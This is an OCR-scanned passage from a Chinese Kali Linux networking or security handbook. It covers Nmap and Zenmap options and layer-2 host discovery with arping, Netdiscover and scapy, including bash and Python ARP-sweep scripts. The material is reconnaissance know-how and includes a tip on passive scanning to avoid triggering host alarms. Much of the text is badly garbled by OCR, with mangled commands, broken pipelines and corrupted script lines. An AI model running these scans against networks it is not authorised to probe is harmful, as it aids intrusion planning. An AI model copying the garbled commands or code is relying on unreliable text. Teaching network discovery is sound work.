10.1.9 ”其 他 选项 帮助 信息 


这 里 包括 了 一 些 不 太 明确 分 类 的 其 他 
选项 ， 以 及 一 些 杂 项 。 下 图 为 这 些 选 项 的 
帮助 信息 。 


-hz Print this help Summary page 


参数 说 明 如 下 : 

e -6: 开启 IPv6 扫 描 。 

e -A: 激烈 扫描 模式 选项 ， 这 个 选项 
启用 额外 的 高 级 和 高 强度 选项 
个 选项 启用 了 操作 系统 检测 〈-O) 
和 版 本 扫描 (-sV) ， 相 当 于 以 下 扫 
描 的 组 合 。 

e --datadir <dimame>: 说 明 用 户 Nmap 
数据 文件 位 置 。Nmap 在 运行 时 从 
文件 中 获得 特殊 的 数据 ， 这 些 文 
件 有 Nmap-service-probes，Nmap- 
services, Nmap-protocols, Nmap- 
Ipc，Nmap-mac-prefixes 和 Nmap-os- 
fingerprints。Nmap 首 先 在 --datadir 
选项 说 明 的 目录 中 查找 这 些 文件 。 
未 找到 的 文件 ， 将 在 BMAPDIR 环 
境 变量 说 明 的 目录 中 查找 。 接 下 来 
是 用 于 真正 和 有 效 UID 的 ~/.Nmap 
或 Nmap 可 执行 代码 的 位 置 〈 仅 
Windows32) ; 然后 是 编译 位 置 ， 
如 /usrlocal/share/N map 或 /usr/share/ 
Nmap。Nmap 查 找 的 最 后 一 个 位 置 
是 当前 目录 。 

e --send-eth: 使 用 原 以 太 网 帧 发 送 。 

e --send-ip: 在 原 了 P 层 发 送 。 

e --privileged: 假定 用 户 具 有 全 部 
权限 。 


e --interactive: 在 交互 模式 下 启动 。 

e -V: 打印 版 本 信息 ， 也 可 表示 为 
--Version。 

e -h: 打印 一 个 短 的 帮助 屏幕 ， 也 可 
表示 为 -help。 


10.1.10 Nmap 图形 模 式 


最 后 使 用 Zenmap 命 令 ， 可 以 开启 Nmap 
图 形 模 式 。 其 中 包含 多 种 扫描 选项 ， 它 对 
网 络 中 被 检测 到 的 主机 按照 选择 的 扫描 选 
项 和 显示 结 点 进行 探查 。 用 户 可 以 建立 一 
个 需要 扫描 的 范围 ， 这 样 就 不 需要 再 输入 
大 量 的 IP 地 址 和 主机 名 了 。 

使 用 Nmap 图 形 模式 进行 扫描 的 具体 操 
[se 加 打开 Nmap 图 形 操作 界面 ， 如 下 图 
所 示 。 


® Zenmap 一 5 X 

Hi IAD BaD) Wt 

Erie We: mence scan 四 

:|nmap T4-AY 

[可 | 名 Nmap 0/ 二 拓 计 二 后 扫兴 

二 机 “ 
Eo 


[Sep 图 要 扫描 单 台 主 机 ， 可 以 在 “目标 ”后 
的 文本 框 内 输入 主机 的 IP 地 址 或 网 址 ; 要 扫 
描 某 个 范围 内 的 主机 ， 可 以 在 该 文本 框 中 
输入 192.168.0.1-150， 如 下 图 所 示 。 


Zenmap o x 
1 IAD Ba WH 
Ens: |192.168.01-15q WE: Intense scan EE 
人 $: [nmap -T4 -A 192.1680.1-150 
ED | NmapiEd 车 / 主 圳 拓 # 主 可 朋 征 扫 关 
过 作 琳 统 4 主机。 “ Ea 
过 机 
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侈 提 示 : 在 扫描 时 ， 还 可 以 用 “*#?” 替 换 掉 
IP 地 址 中 的 任何 一 部 分 ， 如 “192.168.1.*” 
等 同 于 “192.168.1.1-255”; 要 扫描 一 个 更 
大 范围 内 的 主机 ， 可 以 输入 “192.168.1， 
2，3.*”， 此 时 将 扫描 “192.168.1.0”“19 
2.168.2.0”“192.168.3.0” 三 个 网 络 中 的 所 
有 地 址 。 


[step 图 要 设 置 网 络 扫描 的 不 同 配置 文件 ， 
可 以 单 击 “ 配 置 ”后 的 下 拉 列 表 框 ， 从 中 
选择 Intense scan、Intense scan plus UDP 和 
Intense scan,all TCP ports 等 选项 ， 从 而 对 网 
络 主机 进行 不 同方 面 的 扫描 ， 如 下 图 所 示 。 


zermep m 呈 看 ， 汪 
扫 后 (a) 工具 D 配置 2) 帮助 (H) 


BF |192.1680.1-150 EE: Irtense scan EE 
命令 :|nmap -T4 -A -v 192.168.0.1-150 Intense scan 

Intence scan Plus UDP 
EE Doese son slTcppons 


氛 作 系统 4 三 机 。 


Intense acan no Fing 


Ping scan 


Regular scan 


Slow comprehensve scan 


过 4 主机 


[ep 加 单 南 “ 扫 描 ” 按 钮 开始 扫描 ， 稍 等 一 
会 儿 ， 即 可 在 “Nmap 输出 ”选项 卡 中 显示 
扫描 信息 ， 在 扫描 结果 信息 中 ， 可 以 看 到 扫 
描 对 象 当前 开放 的 端口 信息 ， 如 下 图 所 示 。 


= Lemmep - oO x 
sl) 工具 站 BD) NH) 
Bs% 19216801-150 可 Be intense van EE 
BO nrap T4192156.01-150 
EE 
要 
EE 


step 国 选择 “端口 /主机 ”选项 卡 ， 在 打开 
的 界面 中 可 以 看 到 当前 主机 显示 的 端口 、 
协议 、 状 态 和 服务 信息 ， 如 下 图 所 示 。 
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- 5 “| | 务 ” 选 项 卡 ， 可 以 查看 当前 主机 的 服务 信 
Hs) IRD BE) Rind x A Ey 
1 司 丽 丽 | 息 ， 如 端口 、 协 议 、 状 态 等 ， 如 下 图 所 示 。 
BS: nmep T+ A v19216801-150 
ET 司 wmpid as 后 | 衣 才 2 并 
re OECD Fe ee 三 
5 192.16804 Om wm wm i 192.1680.1 = 
| DW i 而 吕 汪 1921680.106 BG woneoaa 5 
a 19216B0.106 1921680.112 | 油 口 《 六 议 ， 状 态 ， 服务 4 方法 
下 11680112 i 日 加 tp open hup probed 
日 1900 tp open upnp table 
[4 
step 国 选择 “拓扑 ”选项 卡 ， 在 打开 的 界 


面 中 可 以 查看 当前 网 络 中 计算 机 的 拓扑 结 
构 ， 如 下 图 所 示 。 


zenmap 


- oO x 
Isla) 工具 四 ”本 关中 再 动 册 ) 

| Em 192,168.0.1-150 -| BIntense zcon ->| Es| Ea 
9 mep Th A v19215801-150 

ED wps xc Fr mae pm 

人 eqend RPER 


口 。 19216801 

生 1921680104 
人。 1921680106 
有 192.1680112 


[= 


[egg 单 去 “查看 主机 信息 ”按钮 ， 打 开 
“查看 主机 信息 ”窗口 ， 在 其 中 可 以 查看 
当前 主机 的 一 般 信息 、 操 作 系 统 信息 等 ， 
如 下 图 所 示 。 


人 二 看 主机 生息 - DO Xx 

EE 4 葛 规 服 涯 -小 击 汉 过 

1921680.4106 Sm 

1921680112 Mh pval 19215801 避 

1921680104 二 
Em: 


最后 后 动 Wed Aug 02 03.42:45 2017 [1155577)。 
日 据 作 到 红 


所 并 OD: | 30/tcp open | 
TE: 大 信 


BE 
98 Cancn imageRUNNER C5135 printer 


上 序列 


B65 国 在 “查看 主机 信息 ”窗口 中 选择 “ 服 
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选择 “路 由 追踪 ”选项 卡 ， 在 打开 的 
界面 中 可 以 查看 当前 主机 的 路 由 器 信息 ， 
如 下 图 所 示 。 


下 二 看 主机 人 四 
Ha 
19216801 
1921680106 
1921680112 
19216804104 


《4 疯 服务 中 由 这 于 


<b>/<b> 短 口中 由 过 卫 信息 怠 闪 <b>1<b> 次 已 3089 肢 。 


在 Nmap 操 作 界面 中 选择 “主机 明 
细 ” 选 项 卡 ， 在 打开 的 界面 中 可 以 查看 当 
前 主机 的 明细 信息 ， 包 括 主机 状态 、 地 址 
列表 、 操 作 系统 等 ， 如 下 图 所 示 。 


Zermep - oO x 
Ss IAD Ba Reh 
EE 未 1921680.1-150 -| Intense con 习 国 区 


:nmap 人 4 了 19215801150 


ET 
ra [STR 
D19216801 二 
216a0104 Ep 
19216a0106 Fw: > 口 
312168012 a 
TD 0 


L1155577 "| 

SS: Wed Aug 02 0axt245 2017 

二 
I 
me 


19216301 


MACE: FABacD335073 


SR Caron imageRUNNER C5185 prirter 


10.2 ”二 层 扫描 


数据 链 路 层 的 数据 单位 为 帧 ， 主 要 分 
为 : 逻辑 链 路 控制 (LLC) 和 介质 访问 控 
制 (MAC) ， 其 中 主要 的 协议 是 ARP (Ad- 
dress Resolution Protocol， 地 址 解析 协议 ) 
协议 ， 它 将 32 位 JP 地址 解析 为 48 位 以 太 网 
地 址 ， 需 要 注意 的 是 ，ARP 协 议 对 应 二 层 
广播 包 ， 而 广播 包 是 无 法 通过 路 由 或 网 关 
访问 外 部 地 址 的 。 


10.2.1 使 用 arping 命 令 


使 用 arping 命 令 向 局 域 网 内 的 其 他 主机 
发 送 ARP 请 求 的 指令 ， 可 以 用 来 测试 局 域 
网 内 的 某 个 人 P 是 否 已 被 使 用 ， 其 中 被 使 用 的 
Pp 地 址 为 在 线 主机 。 命 令 格式 如 下 : 


arping [-RAbDfhqUV] [-c count] [-w 
deadline] [-s source] [-I interface] 


参数 说 明 如 下 : 
-A: ARP 回 复 模式 ， 更 新 邻居 。 
-b: 保持 广播 。 
-D: 复制 地 址 检测 模式 。 
Jf: 得 到 第 一 个 回复 就 退出 。 
-q: 不 显示 警告 信息 。 
-U: 主动 的 ARP 模 式 ， 更 新 邻居 。 

2 

: 发 送 的 数据 包 的 数目 。 
。 -w: 设置 超时 时 间 。 
e -I: 使 用 指定 的 以 太 网 设备 ， 默 认 
情况 下 使 用 eth0。 

e -s: 指定 源 耳 地址 。 

ee。 -h: 显示 帮助 信息 。 

e -V: 显示 版 本 信息 。 

使 用 arpping 命 令 查询 IP 地 址 或 MAC 地 
址 的 操作 步骤 如 下 : 
[sep 贺 查看 某 个 IP 地 址 的 MAC 地 址 ， 使 用 
arping 192.168.1.1 命 令 ， 执 行 效果 如 下 图 所 
示 。 如 果 数据 包 正 确 返 回 ， 则 都 会 包含 一 
个 bytes form 字 段 。 
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FooTeratI Farping T92168-1-T 
ARPING 192.168.1.1 

50 bytes from lc:fa:68:61:2f:88 (192.168.1.1): index=0 time=272.866 usec 
50 bytes from lc:fa:68:61:2f:98 (192.168.1.1): index=1 time=947.757 Usec 
Baliytes fron test9s60:01i24i 0 (92,1560 1): mens? Hits457 nee 


上 -- 192.168.1.1 statistics --- 
3 packets transnitted, 3 packets received, OQ% unanswered (9 extra) 
rtt min/avg/wax/std-dev = 0.273/0.893/1.457/0.485 ms 


[step 图 在 查询 某 个 IP 地 址 的 MAC 地 址 时 ， 
如 果 想 在 发 送 ARP 数 据 包 的 过 程 中 ， 指 
定 ARP 数 据 包 的 数量 ， 可 以 使 用 arping 一 
c 1 192.168.1.1 命 令 ， 执 行 效果 如 下 图 
Wai 


FrootBkaUi:-z arping -c2 192.168.1.1 

ARPING 192.168.1.1 

50 bytes from 1c:fa:68:61;2f:68 [192.168.1.1); index=0 time=1.265 msec 
50 bytes from 1c:fo:58:01:21:08 [192.168.1.1): index=1 time=340.555 usec 


192.168.1.1 statistics 
2 packets transnitted, 2 packets received， gw unanswered (9 extra) 
rtt nin/ava/max/std- dev = 9,341/9,893/1,255/0,462 ms 


当 有 多 块 网 卡 时 ， 需 要 指定 特定 的 设 
备 来 发 送 ARP 数 据 包 ， 这 时 需要 使 用 arping 
-Teth0 -c 1 192.168.1.1 命 令 ， 执 行 效果 如 下 
图 所 示 。 

FrootgRSUIT-7 arping -i ethg -c 1 192.1601.T 

ARPING 132.168.1.1 

69 bytes from lc:;fa:68:01:;2f;68 [192,168,1.1); index=0 timc=930.690 Usec 


1 packets transnitted, 1 Pacxets received,  Q% unanswered (9 extra) 
TEL min/avg/max/std- dev = 0.931/0.931/0.931/6.008 ms 


查看 某 个 IP 是 否 被 不 同 的 MAC 占 
用 ， 这 时 可 以 使 用 arping -d 192.168.1.15 命 
令 ， 执 行 效果 如 下 图 所 示 。 如 果 存 在 被 不 
同 MAC 占 用 的 情况 ， 则 有 可 能 是 ARP 地 址 
欺骗 。 


chr 从 全 
ARPING 192.168.1. 

Timeout 

Timeout 

Timeout 


192.168.1.15 statistics --- 
BB packets transnitted, 0 pacxets received，199% unanswered (9 extra) 


[step 图 查看 茶 个 MAC 地 址 的 IP 地 址 ， 需 要 在 
同一 子 网 中 才能 查 到 ， 这 时 需要 使 用 arping 
一 c 100-25-22-F9-5F-44 命 令 ， 执 行 效果 如 下 
图 所 示 。 


89-25-22-F9-SF-44 statistics 
ll packets transnitted, 9 packets received, 199% 


step 园 确定 MAC 和 IP 的 对 应 情况 ， 使 用 
arping -c 1-T 192.168.1.100 00-25-22-F9- 
5F-44 命 令 ， 执 行 效果 如 下 图 所 示 。 
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ootakali: # arping -c 1 -T 192.168.1.100 60-25-22-F9-5F-44 
ING 99-25-22-F9- 5F-44 

imeout 

-- 00-25-22-F9-5F-44 statistics -- 


packets transmitted，6 packets received，166s% unanswered (9 extra) 


"("-f 2|cut -d")"-f 1 命令 ， 执 行 效果 如 下 图 
所 示 。 


侈 提示 : 如 果 想 要 确定 IP 和 MAC 对 应 情 
况 ， 可 以 使 用 arping -c 1-t 00:13:72:f9:ca:60 
192.168.1.15 命 令 来 确定 。 


Estee 加 有 时 ， 本 地 查 不 到 某 主 机 ， 可 以 
让 网 关 或 其 他 机 器 去 查 。 这 时 使 用 arping 
-c 1-S 10.240.160.1 -s 88:5a:92:12:c1: 
c110.240.162.115 命 令 或 者 arping-c 1-S 
10.240.160.110.240.162.115 命 令 都 可 以 ， 执 
行 效果 如 下 图 所 示 。 


aaiBRRUE rping CT -5 18-296-166"T -5 B85ar92r1rcLrcl 9-2 02 LI 
jarping: Lookup dev: No matching interface found using getifaddrs() 

larping: Unable to autonatically find interface to use， Is it on the local LAN? 
larping: use -1 to manuatty specify interface. Guessing interface ethe， 

ARPING 10.240.162.115 

imeout 


-18.246.162.115 statistics --- 
1 packets transmitted, © packets received, 190% unanswered (9 extra) 


通过 Wireshark 工 具 抓 取 ARP 数 据 包 ， 
其 中 二 层 以 太 网 信息 如 下 图 所 示 ， 其 中 包 
括 目标 地 址 与 源 地 址 ， 可 以 看 出 目标 地 址 
为 广播 地 址 。 


"ToD (D000 TZ) SC BOGGCaSCTTTTTTTTTITTTT 
cat (TET: TF: 


» Souroe: 2196 (00;00:29;39;72:90) 
yp hey 6) 
raller: 0000000000000nondo eeeeo00 


step 园 使 用 Wireshark 工 具 探 测 到 的 ARP 协 
议 ， 其 具体 数据 如 下 图 所 示 。 


太 Address Resolution Protocol 【request) 
Hardware type: Ethernet (1) 
Protocol type: IPv4 (06x0890) 
Hardware size: 6 
Protocol size: 4 
Opcode: request (1) 
Sender MAC address: Vmware_39:f2:9c (99:0c:29:39:f2:9c) 
Sender IP address: 192.168.1.191 
Target MAC address: 00:06:00 90:60:00 (99:69:09:96:69:69) 
Target IP address: 192.168.1.1 


step 圈 当 目 标 地 址 存在 即 会 返回 MAC 地 
址 ， 如 果 不 存 在 则 不 会 返回 。 返 回 的 ARP 
响应 数据 包 如 下 图 所 示 ， 这 就 是 对 探测 数 
据 包 进行 的 回应 。 

dress Resolution Protocol (reply) 

Hardware type: Ethernet (1) 

Protocol type: IPv4 (9x9869) 

Hardware size: 6 

Protocol size: 4 

Opcode: reply (2) 

Sender MAC address: Tp-LinkT_61:2f:98 (1lc:fa:68:91:2f:98) 

Sender IP address: 192.168.1.1 


Target MAC address: Vmware 39:f2:9c (99:gc:29:39:f2:9c) 
Target IP address: 192.168.1.191 


step 回 使 用 管 道 簿 选 可 以 截取 出 存在 主机 
的 IP 地 址 ， 这 时 使 用 arping -c 1 192.168. 
-f Slcut -d 


1.1|grep"bytes from"|cut -d" " 
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cut -d" " -f Slcut -d"(" -f 2|cut -d")" -f 


root@kali:-# arping -c 1 192.168.1.1|grep " Tas from"[ 
192.168.1.1 


参数 说 明 如 下 : 
® grep “bytes from” 
主机 。 
e cut-d“”-f5: 是 以 空格 作为 区 分 
截取 第 五 行 的 信息 。 
e cut -d“(”-f 2: 去 除 IP 地 址 前 面 的 
"(" 插 号 。 
® cut -4“)”-f 1: 
")" 括 号 。 
除 上 述 介绍 的 内 容 外 ， 用 户 还 可 以 使 
用 shell 脚 本 来 实现 自动 化 扫描 ， 下 面 是 脚本 
文件 ， 该 脚本 遍历 eth0 网 卡 的 整个 网 段 ， 具 
体 代码 如 下 : 


: 是 截取 存活 


去 除 IP 地 址 后 面 的 


#!/bin/bash # 使 用 哪 种 脚本 进行 解释 固定 
格式 ,这 里 用 的 是 Bshell 

if [ "$#" -ne 1 ]; then # 参 数 不 等 于 1 
给 出 提示 信息 


echo "Usage - ./arping.sh [interface]" 

echo "Excample - ./arping.sh eth0" 

echo "Example will perform an RARP 
scan of the local subnet to which eth0 
is assigned" 


exit 

五 

interface=$1 # 第 一 个 参数 赋 给 
interface 变 量 

# 取 出 网 卡 信息 中 的 IP 地 址 

prefix=$ (ifconfig S$interface | grep 
-netyeut = "t= aon = = T= 


for addr in $(seq 1 254);do # 定 义 一 个 
adqdr 变 量 取 值 为 一 个 序列 遍历 整个 网 段 

# 将 IP 地 址 组 装 发 出 arping 包 

arping -c 1 $prefix.$addr | grep 
| 0 
= 2 Venut = “Y= 

done 


还 可 以 编写 用 于 读 取 文 本 的 脚本 ， 该 
脚本 可 以 读 取 指定 文件 ， 并 扫描 文件 中 给 
定 的 耳 地 址 ， 具 体 代码 如 下 : 


#!/bin/bash 
ES | We 3 el 


echo "Usage - ./arping.sh [interface]" 
echo "Excample - ./arping.sh file" 
echo "Example will perform an RARP 
scan of the local subnet to which eth0 
is assigned" 

exit 

fi file=$1 

for addr in $(cat $file);do # 读 取 指 定 文件 

arping -cc 1 $addr | grep "bytes 
EGR I gs Se 
Lab -on 

done 


侈 注意 : 执行 脚本 前 需 先 修改 脚本 文件 的 
执行 权限 ， 如 果 没有 执行 权限 会 报错 ， 这 
里 可 以 通过 chmod 755 < 脚本 名 称 > 命令 来 使 
脚本 具有 可 执行 权限 。 


10.2.2 ”使 用 工具 扫描 


在 二 层 扫描 中 ， 用 户 可 以 使 用 工具 
来 扫描 ， 下 面 介绍 三 个 扫描 工具 的 具体 应 
用 ， 分别 是 Nmap、Netdiscover 和 scapy。 


1. Nmap 工 具 


这 里 只 讲解 Nmap 在 二 层 扫描 的 应 用 ， 
Nmap 有 很 多 相应 的 参数 ， 不 过 ， 在 二 层 扫 
描 中 Nmap 不 做 端口 扫描 ， 下 面 介绍 Nmap 扫 
描 工 具 在 二 层 扫 描 中 的 具体 应 用 。 

[step 图 探测 主机 是 否 存 在 ， 这 时 可 以 使 用 
Namp -sn 192.168.1.1 命 令 ， 执 行 效果 如 下 
图 所 示 。 


FooTERaLL /Test/2# nnap -Sn 192.168.1.L 
en Nmap 7.70 ( https://nmap.org ) at 2018-10-23 64:44 EDT 
Nmap scan report for 192.168.1.1 

Host is up (9.99654s latency! 

IAC Address: 1C:FA:68:01:2F:08 (Tp-link Technologies) 

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds 


[step 图 网 段 扫 描 ， 使 用 Nmap -sn 192. 168. 
1.1-254 命 令 或 者 Nmap -sn 192.168.1.0/24 
命令 可 以 进行 网 段 扫描 ， 执 行 效果 如 下 图 
所 示 。 


Foot@kali:~/Test/2# nmap -sn 192.158.1.1-254 

Starting Nmap 7.70 ( https://nnap.org ) at 2018-19-23 64:47 EDT 
map scan report for 192.168.1.1 

ost is up- 

IAC Address: 1C:FA:68:01:2F:08 (Tp-link Technologies) 

map scan report for 192.168.1.199 

iost is up (9.09022s Latencyl 

IAC Address; 99:25:22:F9:5F:44 (ASRock Incorporation) 

Nmap scan report for 192.168.1.191 

Host is up. 

Nmap done: 254 IP addresses |3 hosts up) scanned in 7.91 seconds 
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人 移 提 示 : 在 扫描 过 程 中 ， 用 户 可 以 发 现 使 
用 Nmap 扫 描 要 比 使 用 arping 脚 本 快 得 多 ， 
而 且 还 会 扫描 出 更 多 的 信息 ， 如 网 卡 型 
号 、 主 机 延迟 等 。 


step 图 读 取 文件 ， 并 根据 文件 中 给 定 的 地 址 
进行 扫描 ， 使 用 Nmap -iL addr -sn 命令 ， 执 
行 效果 如 下 图 所 示 。 


Foot@kali: ~/Test/2# nmap -iL addr -sn 

Starting Nmap 7.79 ( https://nnap.org ) at 2918-19-23 94:57 EDT 
Nmap scan report for 192.168.1.1 

Host is up (9.69682s latency). 

MAC Address: 1C:FA:68:61:2F:98 (Tp-link Technologies) 

Nmap scan report for 192.168.1.169 

Host is up (9.996155 latency). 

MAC Address: 96:25:22:F9:5F:44 (ASRock Incorporation) 

Nmap scan report for 192.168.1.191 

Host is up. 

Nmap done: 4 IP addresses (3 hosts up) scanned in 0.33 seconds 


2. Netdiscover 工 具 


Netdiscover 是 一 个 ARP 侦 查 工具 ， 可 用 
于 无 线 网 络 环 境 。 该 工具 在 不 使 用 DHCP 的 
无 线 网 络 上 非常 有 用 。 使 用 Netdiscover 工 具 
可 以 在 网 络 上 扫描 IP 地 址 ， 并 检查 在 线 主 机 
或 搜索 为 主机 发 送 的 ARP 请 求 。 

具体 操作 步 又 如 下 : 
主动 扫描 ， 这 时 使 用 netdiscover -i 
eth0 -r 192.168.1.1/24 命 令 ， 其 中 -i 是 指定 网 
卡 ，-r 是 指定 网 络 地 址 段 ， 执 行 效果 如 下 图 
所 示 。 


EUrraNEU Scanning FINISR6HT | Screon VIews UNIGUS Hosts 


2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 120 


192.168.1.1 


1c:18:68:01:2f:08 1 
192 168-1.100 90:25:22:f9:5f:44 u 


50 TP-LINK TECHNOLOGIES C0, ,LTD. 
68 _ Asrock Incorporation 


读 取 一 个 文件 并 扫描 文件 中 给 定 的 IP 
地 址 段 ， 这 时 使 用 netdiscover -i ech0 -l] add. 
txt 命 令 ， 执 行 效果 如 下 图 所 示 。 


Wings Finished! | Screen View: Unique Hosts 


11 Captured ARP Req/Rep packets, from 3 hosts. Total size: 668 


RE PAC Naress me en WAC Vendor 7 Hosthane 


5 300 Tp-LINK TECHNOLOGLES C0.,LTD. 
5 300 AsRock Incorporation 
1 68 GUANGDONG OPPO MOBILE TELECOMUNL 


[step 图 被 动 扫描 ， 使 用 netdiscover -i 
ech0 -p 命 令 ， 此 时 会 进入 被 动 模 式 
(passive) ， 并 扫描 出 当前 在 线 主机 ， 执 
行 效果 如 下 图 所 示 。 
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DTTENEI Scanning (passive) | Screen View: Unique Hosts 


6 Captured ARP Req/Rep packets, fron 2 hosts. Total size: 369 


3 RT MAC Address Count Len MAC Vendor / Hostnane 
192,168.1.199 。 69:25:22:T9:5f:44 2 128 AsRock Incorporation 
192 168.1 .1 1c:fa:6 4 348 TP-LINK TECHNOLOGIES CO. ,LD 


人 图 注 意 : 使 用 主动 扫描 可 能 会 引起 主机 报 
警 ， 此 时 可 以 采用 被 动 扫描 ， 被 动 扫描 不 
主动 发 送 ARP 数 据 包 ， 而 是 将 网 卡 置 入 混 
杂 模 式 收 集 网 络 中 的 数据 包 从 而 发 现 网 络 
中 的 主机 。 


3. scapy 工 具 


scapy 可 以 作为 python 库 进行 调用 ， 当 
然 也 可 以 单独 作为 工具 使 用 ， 它 可 以 实现 
抓 包 、 分 析 、 创 建 、 修 改 、 注 入 网 络 流量 
等 功能 。 

使 用 的 具体 操作 步骤 如 下 : 
fsep 园 在 Kali Linux 运 行 界面 中 执行 scapy 命 
令 ， 即 可 进入 scapy 主 界面 ， 如 下 图 所 示 。 
目前 使 用 的 最 新 版 本 为 5.8.0。 


DoTORaLI -# Scop 
ARNING: NO route found for 1pv6 destination 


: (no defautt route?) 


了 /Vea 
Y/Yspes se ce 有 

my omy rp 

AmAsAYYYIYYTTY// 


pceev//p 
SPPPP7Y18 


Welcone to Scapy 
Version 2.4. 

h 

" 


Yee at 
0 
SpEPY//// /IVPSpS 

ceancs 


using Tpython 5.8.0 


[step 图 初次 使 用 可 能 会 有 一 个 警告 WARNING: 
No route found for IPv6 destination :: (no 
default route?) 命 令 ， 这 是 由 于 缺少 gnuplot 
支持 。 这 时 ， 可 以 使 用 apt-get install python- 
gnuplot 命 令 来 安装 该 软件 ， 执 行 效果 如 下 
图 所 示 。 


GatBESUIICN apEGeE Install PyUon-gnuptot 
在 读 到 软件 包 列表 ... 完成 
分 你 件 外 的 你 吉美 大 多 
在 证 了 状态 
双关 人 省 总 自 避 安 着 并 有 地 在 不 再 到 了 
Tibx255-150 python-backports.ssl-natch-hostnane python-beautifulsoup 
ruby-terminat-tabte ruby-unicode-display-width 
apt autorenmove' 们 抒 蔷 它 (它们 ) 


直子 48 个 次 伯 包 册 可 村 要 了 1 个 软件 外 ,要 名 新 个 炊 件 包 ,有 5 个 次 件 外 未 被 升 最 
要 下 载 83.4 kB 的 归 
是 四 晤 二 车 丰 "oo7 ke 的 四 外 至 则 。 


step 图 在 scapy 工 具 中 ， 使 用 ARP().display() 
Fi ， 可 以 显示 出 ARP 数 据 包 的 头 结构 ， 
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如 下 图 所 示 。 其 中 ARP() 是 一 个 函数 ， 
displayO 属 于 ARPO 的 一 个 子 函 数 。 


p>> ARP().disptay() 

###[ ARP ]### 
hwtype= 9x1 
ptype= 9x869 
hwlen= 6 
plen= 4 
op= who-has 
hwsrc= 60:0c:29:39:f2:9c 
psrc= 192.168.1.191 
hwdst= 900:00:00:990:09:99 
pdst= 6.9.0.9 


侈 提示 : 通常 ，ARPO 在 使 用 时 可 以 先 定义 
一 个 变量 ， 然 后 用 ARP() 为 其 赋值 ， 一 旦 赋 
值 完成 ， 变 量 便 具有 ARP() 的 功能 ， 例 如 : 
atp=ARP0， 定 义 变量 amp 并 赋值 。 
构建 查询 数据 包 ， 使 用 arp. 
pdst="192.168.1.1" 命 令 ， 构 建 一 个 查询 
192.168.1.1 的 数据 包 ， 执 行 arp.display() 命 
令 ， 执 行 效果 如 下 图 所 示 。 可 以 看 到 pdst 字 
段 已 经 被 修改 。 
>> arp=ARP() 
>> arp.pdst="192.168.1.1" 
>> arp.display() 
新 [ ARP ] 间 ### 
hwtype= 9x1 
ptype= 9x809 
hwlen= 6 
plen= 4 
op= who-has 
hwsrc= 00:0c:29:39:f2:9c 
psrc= 192.168.1.101 
hwdst= 9090:00:00:00;:00:09 
pdst= 192.168.1.1 
[Eee 图 发 送 构 建 的 数据 包 ， 构 建 完 数据 包 
后 ， 可 以 使 用 sr1() 将 数据 包 发 送出 去 ， 执 行 
srl(arp) 命 令 ， 执 行 效果 如 下 图 所 示 。 发 送 
数据 包 后 可 以 看 到 应 答 数 据 包 信息 ， 其 中 
op 字段 将 变 成 is-at 应 答 ， 源 地 址 目的 地 址 信 
息 也 会 改变 。 


>> SrITarpJ 
lBegin emission: 
.+Finished sending 1 packets. 


Received 3 packets, got 1 answers, renaining © packets 
[ARp hutype=0x1 ptype=ex899 hvlen=6 plen=4 op=is-at hwsrc=lc:Ta:68:9| 
1:2f:08 psrc 8.1 ec 159.1.161 | 
|<Padding 1o XA\AOONAO0\ 
xeb\xee\xgeAx 


[step 国 查询 返回 数据 包 信息 。 当 发 送 完 数据 
包 后 ， 会 返回 一 定 的 数据 ， 这 个 返回 的 数 
据 可 以 作为 信息 赋值 给 一 个 变量 ， 例 如 : 
answer=sr1(arp)。 通 过 使 用 answer.display() 
命令 ， 可 以 查看 返回 数据 包 的 信息 ， 执 行 


效果 如 下 图 所 示 。 


>> answer.display() 
关 ##[ ARP ] ### 
hwtype= Ox1 
ptype= 9x869 
hwlen= 6 
plen= 4 
op= is-at 
hwsrc= 1c:fa:68:01:2f:08 
psrc= 192.168.1.1 
hwdst= 60:0c:29:39:f2:9c 
pdst= 192.168.1.161 
A###[ Padding ]### 
load= '\x00\x00\x00\x00\x00\x00\x00\x0 
B\X69\X99\X99N\x99\X69N\X99N\x99N\X99NX99\X99 


[step 园 数据 包 的 发 送 与 显示 ， 通 过 一 条 指令 
可 以 完成 数据 包 的 发 送 与 显示 ， 该 命令 为 
sr1(ARP(pdst="192.168.1.1")).display()， 执 
行 效果 如 下 图 所 示 。 


>> Srl(ARP(pdst="192.168.1.1")).display() 
Begin emission: 
Finished sending 1 packets. 
站 
Received 1 packets, got 1 answers，remaining 9 packets 
###[ ARP ]### 

hwtype= gx1 

ptype= 9x899 

hwlen= 6 

plen= 4 

op= is-at 

hwsrc= lc:fa:68:01:2f:08 

psrc= 192.168.1.1 

hwdst= 00:0c:29:39:f2:9c 

pdst= 192.168,1,191 
###[ Padding ]### 

load= '\x00\xQO\x0O\xQO\xQ0\x00\x00\x00\x00\x00\x0 

le\xegvxggNx9gNxgg\x99NxggNx99， 


另外 ，scapy 工 具 支 持 使 用 python 脚 本 
语言 调用 ， 下 面 给 出 一 段 调 用 脚本 代码 。 
具体 代码 如 下 : 


#!/usr/bin/python  #python 脚 本 格式 
import logging 埋 导 入 日 志 库 文件 
import subprocess  # 导 入 系统 命令 调用 库 


logging.getLogger ("scapy.runtime"). 
setLevel (logging .ERROR) 
塌 设 置 日 志 等 级 
from scapy.all import * 
# 导 入 scapYy 库 的 所 有 文件 
if len(sys.argv) !=2: # 如 果 输 入 的 参数 不 
等 于 2 做 出 提示 下 面 是 具体 提示 信息 
print"Usage . ./arp disc.py 
[interface]™" 
print"Example . ./arp disc.py eth0" 
print "Example will perform an ARP 
scan of the local subnet to which eth0 
is assigned" 
SYS -exit () 
CE 
# 将 网 卡 参数 赋值 给 变量 interface 
# 执 行 ifconfig 命 令 从 中 筛选 出 信息 
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My = Spbp rocer sr hed 
output ("ifconfig"+" "+interfacet+" | grep 
"inet' ",shell=True) .strip() 

ip = ip.split(" ')[1] # 截 取 IP 字 段 


prefix = ip.split(".")[0]+'.'+ip; 
SDI NU pe eT 
# 截 取 IP 前 三 个 字段 


for addr in range (0,254) : # 定 义 循环 

ip=prefix+str (addr) ## 构 建 ITP 地 址 

坦 下 面 这 段 代码 用 于 发 送 数据 包 ， 设 置 超时 时 间 
0.1lms，verbose=0 不 显示 错误 信息 


answer = sr]l (ARP (pdst=ip),timeout= 
0.1,verbose=0) 
if answer == None: # 过 滤 掉 空 信息 
pass # 如 果 没 有 信息 过 滤 掉 
else: 
print ip  ”# 打 印 出 存活 主机 


除 此 之 外 ， 还 可 以 编写 用 于 读 取 文 本 
